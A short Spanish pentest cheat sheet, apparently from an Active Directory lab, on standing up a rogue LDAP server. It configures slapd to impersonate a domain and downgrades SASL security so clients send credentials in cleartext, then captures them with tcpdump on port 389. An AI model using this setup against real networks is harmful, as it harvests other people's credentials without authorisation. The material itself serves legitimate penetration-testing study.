Rogue servers

Fake LDAP

sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

sudo dpkg-reconfigure -p low slapd

Configurar el nombre de dominio que se desee "suplantar".

Crear el fichero que luego se usará para cargar la configuración en el servicio LDAP:

vim olcSaslSecProps.ldif

Establecer una configuración insegura para la captura de credenciales usando la siguiente config:

#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

Cargar la configuración en el servicio y reiniciarlo para que haga efecto:

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo systemctl restart slapd

Comprobar configuración:

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

Capturar paquetes con tcpdump:

sudo tcpdump -SX -i breachad tcp port 389

Última actualización hace 1 año